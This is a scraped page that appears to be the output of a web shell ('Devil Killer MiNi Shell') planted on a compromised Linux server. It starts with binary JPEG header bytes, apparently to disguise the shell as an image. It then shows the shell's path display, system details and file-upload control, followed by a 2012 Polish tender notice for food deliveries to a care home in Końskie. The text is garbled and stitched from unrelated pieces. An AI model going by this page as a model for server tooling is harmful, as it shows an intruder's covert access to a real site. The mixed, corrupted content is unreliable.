JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121120/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121120/244661-N-2012.html

<p class="kh_header"><b>Końskie: Sukcesywne dostawy artykułów spożywczych do magazynu Domu Pomocy Społecznej w Końskich.</b><br>
<b>Numer ogłoszenia: 244661 - 2012; data zamieszczenia: 20.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Konecki , ul. Staszica 2, 26-200 Końskie, woj. świętokrzyskie, tel. 0-41 372 41 34, faks 0-41 372 83 20.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy artykułów spożywczych do magazynu Domu Pomocy Społecznej w Końskich..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy artykułów spożywczych do magazynu 
DPS Cichy Zakątek w Końskich.
Wykonawcy mogą złożyć oferty na dowolną ilość części.
Szczegółowy opis przedmiotu zamówienia stanowi kosztorys cenowy oddzielny dla każdej części - załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia.
Ilości poszczególnych asortymentów w kosztorysie cenowym są ilościami szacunkowymi 
i w trakcie realizacji zamówienia mogą ulegać zmianie (zmniejszeniu bądź zwiększeniu) 
w ramach wartości umowy.
Część 1 Mięso, drób, wędliny,
Kosztorys cenowy na sukcesywne dostawy mięsa, drobiu wędlin 

L.p.	Nazwa artykułu	Jedn.
miary	Ilość	Cena
netto	Wartość
netto
poz. 4 x 5	Stawka podatku
VAT w %	Wartość
podatku VAT poz. 6 x 7	Wartość  ogółem brutto
poz. 6 + 8
1	2	3	4	5	6	7	8	9
1.		Boczek surowy	kg	         5					
2.		Ćwiartka tylna z kurczaka	kg	2.100					
3.		Filet z kurczaka 	kg	550					
4.		Flaki wołowe	kg	100					
5.		Karczek b/k	kg	300					
6.		Kurczaki	kg	200					
7.		Łopatka b/k	kg	1.000					
8.		Mięso gulaszowe z kurczaka	kg	150					
9.		Nogi wp.	kg	       150					
10.		Ozory wp.	kg	100					
11.		Porcje rosołowe b/skrzydeł	kg	900					
12.		Schab b/k	kg	400					
13.		Serca drobiowe	kg	       80					
14.		Serca wp.	kg	       100					
15.		Udziec woł. b/k	kg	250					
16.		Wątroba wp.	kg	100					
17.		Wątróbka drobiowa	kg	     50					
18.		Żeberka	kg	       250					
19.		Żołądki drobiowe	kg	120					
20.		Baleron 	kg	180					
21.		Blok szynkowy	kg	200					
22.		Boczek wędzony gotowany	kg	250					
23.		Kaszanka 	kg	280					
24.		Kiełbasa biała parzona	kg	360					
25.		Kiełbasa dębicka	kg	300					
26.		Kiełbasa jałowcowa 	kg	7					
27.		Kiełbasa krakowska  	kg	300					
28.		Kiełbasa mielonka	kg 	230					
29.		Kiełbasa mortadela	kg	200					
30.		Kiełbasa parówkowa	kg	330					
31.		Kiełbasa szynkowa wp. 	kg	300					
32.		Kiełbasa wiejska	kg	480					
33.		Paluszki drobiowe	kg	150					
34.		Paluszki wp.	kg	150					
35.		Pasztet drobiowy 131g	sztuk	2.300					
36.		Pasztet drobiowy pieczony	kg	130					
37.		Pasztetowa	kg	200					
38.		Pieczeń rzymska	kg	200					
39.		Polędwica drobiowa	kg	200					
40.		Polędwica sopocka	kg	30					
41.		Rolada schabowa	kg	100					
42.		Salceson wp.	kg	200					
43.		Salceson drobiowy	kg	100					
44.		Szynka drobiowa	kg	160					
45.		Szynka konserwowa	kg	100					
46.		Szynka wieprzowa 	kg	220					
47.		Wędzonka krotoszyńska	kg	120					
48.		Słonina b/s	kg	150					
49.		Smalec	kg	180					
Część 2 Mleko i produkty mleczarskie,
Kosztorys cenowy na sukcesywne dostawy produktów mleczarskich 

L.p.	Nazwa artykułu	Jedn.
miary	Ilość	Cena
netto	Wartość
netto
poz. 4 x 5	Stawka podatku
VAT w %	Wartość
podatku VAT poz. 6 x 7	Wartość  ogółem brutto
poz. 6 + 8
1	2	3	4	5	6	7	8	9
1.		Jogurt naturalny 150g	sztuk	1.100					
2.		Jogurt naturalny 450g	sztuk	150					
3.		Jogurt owocowy 150g	sztuk	4.800					
4.		Kefir 400g	sztuk	450					
5.		Masło ekstra kostka 200g	kg	1.850					
6.		Mleko spożywcze 2 %	l	21.000					
7.		Mleko zsiadłe 400g	sztuk	450					
8.		Ser twardy	kg	300					
9.		Serek homo smakowy150 g	sztuk	3.100					
10.		Serek homo naturalny 150g	sztuk	1.100					
11.		Serek topiony 100g	sztuk	1.000					
12.		Serek wiejski 200g	sztuk	1.200					
13.		Śmietana 18 - 24 %	l	900					
14.		Twaróg tłusty	kg	1.100					

Część 3 Pieczywo i wyroby cukiernicze,
Kosztorys cenowy na sukcesywne dostawy pieczywa i wyrobów cukierniczych 
L.p.	Nazwa artykułu	Jedn.
miary	Ilość	Cena
netto	Wartość
netto
poz. 4 x 5	Stawka podatku
VAT w %	Wartość
podatku VAT poz. 6 x 7	Wartość  ogółem brutto
poz. 6 + 8
1	2	3	4	5	6	7	8	9
1.		Bułka 50 g	szt.	44.500					
2.		Bułka 400 g krojona	szt.	5.350					
3.		Bułka 400 g niekrojona	szt.	350					
4.		Bułka grahamka 100 g	szt.	6.800					
5.		Bułka tarta 500g	szt.	300 					
6.		Bułki słodkie 100g (z serem, marmoladą, makiem, jabłkiem, jagodami)	szt.	100					
7.		Chleb 1 kg krojony	szt.	10.600					
8.		Chleb razowy 500 g krojony	szt.	3.100					
9.		Rogale 100g	szt.	1.800					
10.		Ciasto murzynek 	kg	30					
11.		Pączki 100g	szt.	130					
Część 4 Różne artykuły spożywcze,
Kosztorys cenowy na sukcesywne dostawy różnych artykułów spożywczych.

L.p.	Nazwa  artykułu	Jedn.
miary	Ilość	Cena netto	Wartość netto
poz.
4 x 5	Stawka 
podatku VAT
 w %	Wartość
podatku VAT
poz. 6 x 7	Wartość ogółem brutto
poz.  6+8
1	2	3	4	5	6	7	8	9
1.		Ananasy puszka 580g	szt.	150					
2.		Barszcz biały w butelce 0,50l	szt.	700					
3.		Brzoskwinie w puszcze 850g	szt.	150					
4.		Budyń smaki różne 40g	szt.	600					
5.		Chrzan 300g	szt.	160					
6.		Cukier	kg	2.800					
7.		Cukier puder 400g	szt.	      50					
8.		Cukier waniliowy 30g	szt.	100					
9.		Cynamon 20g	szt.	10					
10.		Drożdże 100g	szt.	100					
11.		Dżemy różne smaki 280g	szt.	1.650					
12.		Fasola czerwona puszka 400g	szt.	100					
13.		Galaretka owocowa smaki różne 75g	szt.	300					
14.		Gałka muszkatołowa mielona 15 g	szt.	8					
15.		Groszek konserwowy 400g	szt.	300					
16.		Herbata granulowana 100g	szt.	1.500 					
17.		Imbir mielony 20 g	szt.	8					
18.		Kakao 100g	szt.	20					
19.		Kasza gryczana	kg	10					
20.		Kasza jęczmienna	kg	300					
21.		Kasza manna 	kg	200					
22.		Keczup łagodny 500 g	szt.	300					
23.		Kisiel 40g	szt.	1.100					
24.		Koncentrat pomidorowy
30 % 950g	szt.	210					
25.		Kukurydza w puszcze 400g	szt.	    200					
26.		Kwasek cytrynowy 20g	szt.	    160					
27.		Liść laurowy 10g	szt.	150					
28.		Majeranek 10g	szt.	400					
29.		Majonez 720ml	szt.	300					
30.		Mak 400g	szt.	10					
31.		Makaron gruby 	kg	900					
32.		Makaron wstążka - nitka 	kg	500					
33.		Makaron zacierka 0,25	szt. 	    600					
34.		Masło roślinne kubek 250g	szt.	1.300					
35.		Mąka pszenna	kg	   1.250					
36.		Mąka tortowa	kg	100					
37.		Mąka ziemniaczana	kg 	    100					
38.		Miód 25g	szt.	4.000					
39.		Miód sztuczny 370g	szt.	      10					
40.		Musztarda 190kg	szt.	280					
41.		Ocet 0,50 l	szt.	      10					
42.		Ogórek konserwowy 0,90 kg	szt.	60					
43.		Olej 1 l 	szt.	750					
44.		Papryka konserwowa 0,90 l	szt.	120					
45.		Papryka słodka 20g	szt.	200					
46.		Pieprz mielony 15g	szt.	850					
47.		Płatki jęczmienne 0,40 kg	szt.	    300					
48.		Płatki kukurydziane 0,50kg	szt.	500					
49.		Płatki owsiane 0,50 kg	szt.	   300					
50.		Powidła śliwkowe 280g	szt.	150					
51.		Proszek do pieczenia 30g	szt.	60					
52.		Przyprawa do potraw 200g	szt.	1.100 					
53.		Przyprawa w płynie 1 l	szt.	40					
54.		Przyprawa do drobiu 20g	szt.	30					
55.		Ryż	kg	    900					
56.		Seler konserwowy słoik 320g	szt.	100					
57.		Soda 80g	szt.	5					
58.		Sól jodowana 1 kg	kg	600					
59.		Ziele angielskie 15 g	szt.	    250					
60.		Żelatyna 50 g	szt.	      100					

Część 5 Ryby i konserwy rybne,
Kosztorys cenowy na sukcesywne dostawy ryb i konserw rybnych 


L.p.	      Nazwa  artykułu	Jedn.
miary	Ilość	Cena 
netto	Wartość
netto
poz. 4 x 5	Stawka podatku
VAT w %	Wartość
podatku VAT poz. 6 x 7	Wartość  ogółem brutto
poz. 6 + 8
1	2	3	4	5	6	7	8	9
1.		Filet z mintaja schater bez lodu	kg	500					
2.		Filet z miruny ze skórą	kg	200					
3.		Karp filet	kg	15					
4.		Rolmopsy	kg	12					
5.		Śledzie po kaszubsku	kg	100					
6.		Makrela wędzona	kg	250					
7.		Paprykarz szczeciński 135 g	szt.	600					
8.		Sardynka w oleju 125 g	szt.	1.000					
9.		Szprot w oleju 125 g	szt.	1.200					
10.		Szprot w pomidorach 125g	   szt.	1.200					
11.		Śledź po wiejsku	kg	250					
12.		Tuńczyk w sosie własnym 185 g	szt.	100
					

Część 6 Warzywa i owoce mrożone
Kosztorys cenowy na sukcesywne dostawy warzyw i owoców mrożonych 

L.p.	Nazwa  artykułu	Jedn.
miary	Ilość	Cena
netto	Wartość
netto
poz. 4 x 5	Stawka podatku
VAT w %	Wartość
podatku VAT poz. 6 x 7	Wartość  ogółem brutto
poz. 6 + 8
1	2	3	4	5	6	7	8	9
1.		Brokuły mrożone	kg	250					
2.		Fasolka szparagowa	kg	700					
3.		Leczo 	kg	150					
4.		Mieszanka kompotowa	kg	1.100					
5.		Mieszanka warzywna 
7 składnikowa	kg	300					
6.		Szpinak mrożony 	kg	30					
7.		Uszka z kapustą i grzybami 300g	szt.	60					
8.		Włoszczyzna mrożona paski 	kg	500.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.41.21.00-0, 15.50.00.00-3, 15.81.00.00-9, 15.80.00.00-6, 15.60.00.00-4, 15.33.00.00-0, 15.41.00.00-3, 15.20.00.00-0, 15.33.11.70-9, 15.89.60.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, 
według wzoru - załącznik nr 4 do SIWZ. 
W przypadku oferty składanej przez wykonawców ubiegających się wspólnie 
o udzielenie zamówienia publicznego oświadczenie o spełnieniu warunków o których mowa w art. 22 ust. 1 składa co najmniej jeden z wykonawców w imieniu swoim i pozostałych wykonawców;
- upoważnienie dla osób reprezentujących wykonawcę, a jeżeli wykonawcę
    reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres  
    umocowania podpisane przez osoby uprawnione do reprezentowania wykonawcy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.konecki.wrota-swietokrzyskie.pl/web/guest/dps_konskie_zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Cichy Zakątek
ul. Warszawska 25
26-200 Końskie 
Dział Żywienia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2012 godzina 10:00, miejsce: Domu Pomocy Społecznej Cichy Zakątek
ul. Warszawska 25
26-200 Końskie  
Dział Techniczno - Gospodarczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywne dostawy mięsa, drobiu wędlin..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa artykułu	Jedn.
miary	Ilość	Cena
netto	Wartość
netto
poz. 4 x 5	Stawka podatku
VAT w %	Wartość
podatku VAT poz. 6 x 7	Wartość  ogółem brutto
poz. 6 + 8
1	2	3	4	5	6	7	8	9
1.		Boczek surowy	kg	         5					
2.		Ćwiartka tylna z kurczaka	kg	2.100					
3.		Filet z kurczaka 	kg	550					
4.		Flaki wołowe	kg	100					
5.		Karczek b/k	kg	300					
6.		Kurczaki	kg	200					
7.		Łopatka b/k	kg	1.000					
8.		Mięso gulaszowe z kurczaka	kg	150					
9.		Nogi wp.	kg	       150					
10.		Ozory wp.	kg	100					
11.		Porcje rosołowe b/skrzydeł	kg	900					
12.		Schab b/k	kg	400					
13.		Serca drobiowe	kg	       80					
14.		Serca wp.	kg	       100					
15.		Udziec woł. b/k	kg	250					
16.		Wątroba wp.	kg	100					
17.		Wątróbka drobiowa	kg	     50					
18.		Żeberka	kg	       250					
19.		Żołądki drobiowe	kg	120					
20.		Baleron 	kg	180					
21.		Blok szynkowy	kg	200					
22.		Boczek wędzony gotowany	kg	250					
23.		Kaszanka 	kg	280					
24.		Kiełbasa biała parzona	kg	360					
25.		Kiełbasa dębicka	kg	300					
26.		Kiełbasa jałowcowa 	kg	7					
27.		Kiełbasa krakowska  	kg	300					
28.		Kiełbasa mielonka	kg 	230					
29.		Kiełbasa mortadela	kg	200					
30.		Kiełbasa parówkowa	kg	330					
31.		Kiełbasa szynkowa wp. 	kg	300					
32.		Kiełbasa wiejska	kg	480					
33.		Paluszki drobiowe	kg	150					
34.		Paluszki wp.	kg	150					
35.		Pasztet drobiowy 131g	sztuk	2.300					
36.		Pasztet drobiowy pieczony	kg	130					
37.		Pasztetowa	kg	200					
38.		Pieczeń rzymska	kg	200					
39.		Polędwica drobiowa	kg	200					
40.		Polędwica sopocka	kg	30					
41.		Rolada schabowa	kg	100					
42.		Salceson wp.	kg	200					
43.		Salceson drobiowy	kg	100					
44.		Szynka drobiowa	kg	160					
45.		Szynka konserwowa	kg	100					
46.		Szynka wieprzowa 	kg	220					
47.		Wędzonka krotoszyńska	kg	120					
48.		Słonina b/s	kg	150					
49.		Smalec	kg	180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.41.21.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywne dostawy mleka i produktów mleczarskich..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa artykułu	Jedn.
miary	Ilość	Cena
netto	Wartość
netto
poz. 4 x 5	Stawka podatku
VAT w %	Wartość
podatku VAT poz. 6 x 7	Wartość  ogółem brutto
poz. 6 + 8
1	2	3	4	5	6	7	8	9
1.		Jogurt naturalny 150g	sztuk	1.100					
2.		Jogurt naturalny 450g	sztuk	150					
3.		Jogurt owocowy 150g	sztuk	4.800					
4.		Kefir 400g	sztuk	450					
5.		Masło ekstra kostka 200g	kg	1.850					
6.		Mleko spożywcze 2 %	l	21.000					
7.		Mleko zsiadłe 400g	sztuk	450					
8.		Ser twardy	kg	300					
9.		Serek homo smakowy150 g	sztuk	3.100					
10.		Serek homo naturalny 150g	sztuk	1.100					
11.		Serek topiony 100g	sztuk	1.000					
12.		Serek wiejski 200g	sztuk	1.200					
13.		Śmietana 18 - 24 %	l	900					
14.		Twaróg tłusty	kg	1.100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sukcesywne dostawy pieczywa i wyrobów cukierniczych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa artykułu	Jedn.
miary	Ilość	Cena
netto	Wartość
netto
poz. 4 x 5	Stawka podatku
VAT w %	Wartość
podatku VAT poz. 6 x 7	Wartość  ogółem brutto
poz. 6 + 8
1	2	3	4	5	6	7	8	9
1.		Bułka 50 g	szt.	44.500					
2.		Bułka 400 g krojona	szt.	5.350					
3.		Bułka 400 g niekrojona	szt.	350					
4.		Bułka grahamka 100 g	szt.	6.800					
5.		Bułka tarta 500g	szt.	300 					
6.		Bułki słodkie 100g (z serem, marmoladą, makiem, jabłkiem, jagodami)	szt.	100					
7.		Chleb 1 kg krojony	szt.	10.600					
8.		Chleb razowy 500 g krojony	szt.	3.100					
9.		Rogale 100g	szt.	1.800					
10.		Ciasto murzynek 	kg	30					
11.		Pączki 100g	szt.	130.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Sukcesywne dostawy różnych artykułów spożywczych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa  artykułu	Jedn.
miary	Ilość	Cena netto	Wartość netto
poz.
4 x 5	Stawka 
podatku VAT
 w %	Wartość
podatku VAT
poz. 6 x 7	Wartość ogółem brutto
poz.  6+8
1	2	3	4	5	6	7	8	9
1.		Ananasy puszka 580g	szt.	150					
2.		Barszcz biały w butelce 0,50l	szt.	700					
3.		Brzoskwinie w puszcze 850g	szt.	150					
4.		Budyń smaki różne 40g	szt.	600					
5.		Chrzan 300g	szt.	160					
6.		Cukier	kg	2.800					
7.		Cukier puder 400g	szt.	      50					
